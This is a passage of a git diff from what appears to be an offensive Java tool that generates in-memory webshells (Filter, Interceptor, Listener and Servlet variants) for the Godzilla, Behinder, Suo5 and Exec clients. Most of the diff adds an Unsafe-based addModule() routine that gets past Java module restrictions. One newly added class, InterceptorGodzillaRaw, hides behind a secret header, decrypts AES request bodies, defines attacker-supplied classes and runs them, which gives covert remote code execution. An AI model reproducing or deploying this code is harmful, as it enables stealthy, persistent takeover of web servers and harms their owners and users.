+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = FilterGodzilla.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterSuo5.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterSuo5.java
index feddd0a..532f122 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterSuo5.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterSuo5.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import javax.net.ssl.*;
import java.io.*;
@@ -22,6 +25,7 @@
*/
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.sou5)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class FilterSuo5 implements InvocationHandler, Runnable, HostnameVerifier, X509TrustManager {
public static HashMap addrs = collectAddr();
@@ -49,6 +53,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void task(Object request, Object response, Object filterChain) {
try {
+ addModule();
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
if (filterChain != null) {
@@ -607,6 +612,25 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = FilterSuo5.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
+
@Override
public boolean verify(String hostname, SSLSession session) {
return false;
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorExec.java
index 0323363..a2bc0a5 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorExec.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -14,6 +17,7 @@
*/
@MemShell(MemShell.Interceptor)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class InterceptorExec implements InvocationHandler {
private static String HEADER;
@@ -30,6 +34,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private boolean run(Object request, Object response, Object handler) {
try {
+ addModule();
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return true;
@@ -97,4 +102,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = InterceptorExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzilla.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzilla.java
index ce1d89a..dae9f9a 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzilla.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzilla.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Interceptor)
@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class InterceptorGodzilla implements InvocationHandler {
public static String key; // key
@@ -32,6 +36,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private boolean run(Object request, Object response, Object handler) {
try {
+ addModule();
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return true;
@@ -170,4 +175,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = InterceptorGodzilla.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzillaRaw.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzillaRaw.java
new file mode 100644
index 0000000..bcd1595
--- /dev/null
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/InterceptorGodzillaRaw.java
@@ -0,0 +1,159 @@
+package com.ppp.middleware.memshell;
+
+import com.ppp.annotation.JavaClassModifiable;
+import com.ppp.annotation.MemShell;
+import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import sun.misc.Unsafe;
+
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+/**
+ * @author Whoopsunix
+ */
+@MemShell(MemShell.Interceptor)
+@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Raw)
+@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
+public class InterceptorGodzillaRaw implements InvocationHandler {
+ public static String key; // key
+ public static String pass;
+ private static String lockHeaderKey;
+ private static String lockHeaderValue;
+
+ public InterceptorGodzillaRaw() {
+ }
+
+ public Object invoke(Object proxy, Method method, Object[] args) {
+ if (method.getName().equals("preHandle")) {
+ return run(args[0], args[1], args[2]);
+ }
+ return null;
+ }
+
+ private boolean run(Object request, Object response, Object handler) {
+ try {
+ addModule();
+ String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
+ if (lv == null || !lv.contains(lockHeaderValue)) {
+ return true;
+ }
+
+ Class requestClass = null;
+ try {
+ requestClass = Class.forName("javax.servlet.ServletRequest");
+ } catch (Exception e) {
+ try {
+ requestClass = Class.forName("jakarta.servlet.ServletRequest");
+ } catch (ClassNotFoundException ex) {
+
+ }
+ }
+ Object session = invokeMethod(request, "getSession", new Class[]{}, new Object[]{});
+
+ byte[] data = new byte[Integer.parseInt((String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{"Content-Length"}))];
+ InputStream inputStream = (InputStream) invokeMethod(requestClass, request, "getInputStream", new Class[]{}, new Object[]{});
+ int bytesRead;
+ int offset = 0;
+ while (offset < data.length && (bytesRead = inputStream.read(data, offset, data.length - offset)) != -1) {
+ offset += bytesRead;
+ }
+ inputStream.close();
+ Object payload = invokeMethod(session, "getAttribute", new Class[]{String.class}, new Object[]{"payload"});
+
+ data = x(data, false);
+
+ if (payload == null) {
+ invokeMethod(session, "setAttribute", new Class[]{String.class, Object.class}, new Object[]{"payload", defClass(data)});
+ return false;
+ } else {
+ invokeMethod(requestClass, request, "setAttribute", new Class[]{String.class, Object.class}, new Object[]{"parameters", data});
+ java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();
+ Class cls = (Class) invokeMethod(session, "getAttribute", new Class[]{String.class}, new Object[]{"payload"});
+ Object f = cls.newInstance();
+ f.equals(arrOut);
+ f.equals(request);
+ f.toString();
+ OutputStream outputStream = (OutputStream) invokeMethod(response, "getOutputStream", new Class[]{}, new Object[]{});
+ outputStream.write(x(arrOut.toByteArray(), true));
+ return false;
+ }
+ } catch (Throwable e) {
+ }
+ return true;
+ }
+
+ public Class defClass(byte[] classBytes) throws Throwable {
+ URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+ Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+ defMethod.setAccessible(true);
+ return (Class) defMethod.invoke(urlClassLoader, classBytes, 0, classBytes.length);
+ }
+
+ public byte[] x(byte[] s, boolean m) {
+ try {
+ javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
+ c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(key.getBytes(), "AES"));
+ return c.doFinal(s);
+ } catch (Exception e) {
+ return null;
+ }
+ }
+
+ public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+ final Field field = getField(obj.getClass(), fieldName);
+ return field.get(obj);
+ }
+
+ public static Field getField(final Class clazz, final String fieldName) {
+ Field field = null;
+ try {
+ field = clazz.getDeclaredField(fieldName);
+ field.setAccessible(true);
+ } catch (NoSuchFieldException ex) {
+ if (clazz.getSuperclass() != null)
+ field = getField(clazz.getSuperclass(), fieldName);
+ }
+ return field;
+ }
+
+ public static Object invokeMethod(Object obj, String methodName, Class[] argsClass, Object[] args) throws Exception {
+ try {
+ return invokeMethod(obj.getClass(), obj, methodName, argsClass, args);
+ } catch (Exception e) {
+ return invokeMethod(obj.getClass().getSuperclass(), obj, methodName, argsClass, args);
+ }
+ }
+
+ public static Object invokeMethod(Class cls, Object obj, String methodName, Class[] argsClass, Object[] args) throws Exception {
+ Method method = cls.getDeclaredMethod(methodName, argsClass);
+ method.setAccessible(true);
+ Object object = method.invoke(obj, args);
+ return object;
+ }
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = InterceptorGodzillaRaw.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
+}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerBehinder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerBehinder.java
index 0a392f9..7477075 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerBehinder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerBehinder.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -17,6 +20,7 @@
*/
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Behinder)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ListenerBehinder implements InvocationHandler {
private static String pass;
@@ -38,6 +42,7 @@ public Object getResponse(Object httpServletRequest) throws Exception {
private void run(Object sre) {
try {
+ addModule();
Object request = invokeMethod(sre, "getServletRequest", new Class[]{}, new Object[]{});
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
@@ -117,4 +122,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ListenerBehinder.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerExec.java
index ff63615..46d3bf1 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerExec.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -14,6 +17,7 @@
*/
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ListenerExec implements InvocationHandler {
private static String HEADER;
@@ -76,6 +80,7 @@ public Object getResponse(Object request) throws Exception {
// }
private void run(Object sre) {
try {
+ addModule();
Object request = invokeMethod(sre, "getServletRequest", new Class[]{}, new Object[]{});
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
@@ -143,4 +148,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ListenerExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerGodzilla.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerGodzilla.java
index 0c18a6c..75de38a 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerGodzilla.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerGodzilla.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ListenerGodzilla implements InvocationHandler {
public static String key; // key
@@ -46,6 +50,7 @@ public Object getResponse(Object httpServletRequest) throws Exception {
// }
public void run(Object sre) {
try {
+ addModule();
Object request = invokeMethod(sre, "getServletRequest", new Class[]{}, new Object[]{});
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
@@ -173,4 +178,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ListenerGodzilla.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerSuo5.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerSuo5.java
index bb81ae4..630fc2a 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerSuo5.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ListenerSuo5.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import javax.net.ssl.*;
import java.io.*;
@@ -22,6 +25,7 @@
*/
@MemShell(MemShell.Listener)
@MemShellFunction(MemShellFunction.sou5)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ListenerSuo5 implements InvocationHandler, Runnable, HostnameVerifier, X509TrustManager {
public static HashMap addrs = collectAddr();
@@ -56,6 +60,7 @@ public Object getResponse(Object httpServletRequest) throws Exception {
private void requestInitialized(Object sre) {
try {
+ addModule();
Object request = invokeMethod(sre.getClass(), sre, "getServletRequest", new Class[]{}, new Object[]{});
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
@@ -595,6 +600,25 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ListenerSuo5.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
+
@Override
public boolean verify(String hostname, SSLSession session) {
return false;
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletBehinder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletBehinder.java
index 95e5bec..9b8f962 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletBehinder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletBehinder.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -17,6 +20,7 @@
*/
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Behinder)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ServletBehinder implements InvocationHandler {
private static String pass;
@@ -36,6 +40,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -112,4 +117,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ServletBehinder.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletExec.java
index ea72010..1a18680 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletExec.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -14,6 +17,7 @@
*/
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ServletExec implements InvocationHandler {
private static String HEADER;
@@ -35,6 +39,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -95,4 +100,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
method.setAccessible(true);
return method.invoke(obj, args);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ServletExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletGodzilla.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletGodzilla.java
index 2b6af6e..22cc4bf 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletGodzilla.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletGodzilla.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ServletGodzilla implements InvocationHandler {
public static String key; // key
@@ -32,6 +36,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -153,4 +158,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
method.setAccessible(true);
return method.invoke(obj, args);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ServletGodzilla.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletSuo5.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletSuo5.java
index 42c07f7..bb2204f 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletSuo5.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ServletSuo5.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import javax.net.ssl.*;
import java.io.*;
@@ -22,6 +25,7 @@
*/
